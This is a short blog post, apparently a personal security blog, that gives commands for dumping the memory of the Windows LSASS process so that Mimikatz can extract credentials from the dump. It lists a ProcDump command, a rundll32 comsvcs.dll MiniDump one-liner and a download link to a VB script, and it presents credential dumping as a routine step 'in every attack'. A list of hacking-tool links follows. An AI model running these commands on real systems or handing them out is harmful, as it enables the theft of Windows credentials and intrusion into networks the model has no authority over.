Welcome To Savi Savi Nenapu

Naveen Chinthakaaya

Thursday, April 16, 2020

LSASS Dumping Methods ( For Mimikatz )


In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.


Here are some of the important methods,

Using ProcDump :

1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"


Using VB Script :

Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp













rundll32 Command :

Essentially previous method VBS script is using following command for dumping Lsass.exe process

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.



















Related posts


  1. Pentest Recon Tools
  2. Hacker Tools
  3. Top Pentest Tools
  4. Hacker Tools For Pc
  5. Pentest Tools For Mac
  6. Github Hacking Tools
  7. Game Hacking
  8. Easy Hack Tools
  9. Pentest Tools Github
  10. Hack Tools For Ubuntu
  11. Hacker Tools 2020
  12. Pentest Tools Windows
  13. Tools Used For Hacking
  14. Hacker Tools For Pc
  15. Pentest Tools Framework
  16. Nsa Hack Tools Download
  17. Pentest Tools For Mac
  18. Pentest Tools List
  19. How To Make Hacking Tools
  20. Hacking Tools Mac
  21. Hackrf Tools
  22. Hacker Tools List

No comments:

Post a Comment